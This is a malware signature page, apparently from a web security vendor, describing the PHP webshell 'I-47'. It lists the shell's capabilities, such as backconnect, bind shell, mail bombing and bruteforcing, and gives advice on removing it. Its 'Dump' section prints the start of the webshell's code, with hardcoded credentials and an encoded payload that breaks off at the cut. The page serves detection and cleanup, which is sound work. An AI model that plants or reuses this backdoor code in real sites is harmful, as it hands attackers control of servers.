Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.i-47.002

php.backdoor.i-47.002

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.

I-47 is collection of malicious webshells. Webshell allows unauthorized access and control of an affected system by a remote attacker. Using them, attacker is able to run set of commands for various actions such as file manipulation, system information gathering and similar. This webshell is continually updated and each release has new features or bug fixes. Some of the implemented features are:

- Mass Code Injector
- Mass Mailer + Mail Bomber
- Forums Defacer + Forum Password Changer
- Dos
- Backconnect with perl, c, php
- Bind Shell
- Database Connect & Dump
- Domain info
- PHP Evaluate
- Automatic enable all functions and turn safe mode off
- Download whole website with just one click
- Included Bruteforcer

Affecting

Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).

Cleanup

You can search for the "Coded By Arjun" in your files and remove the malicious code (or whole file if there is no legitimate content). You can also sign up with us and let our team remove the malware for you.

Dump

//========================================//
//========+++I-47 v1.3+++==========//
//========================================//
//====+++Coded By Arjun+++===//
//========================================//
//=====+++An Indian Hacker+++=====//
//========================================//

// Set Username & Password
$user = "avodoo";
$pass = "074254963";

$lktd = "eNrsvGmT40iSKPZ5xmz/Q6mszaZH2B0AxEHgrVpPuG+CAEFca2ttuG+AIIhTtv9dIDMrs6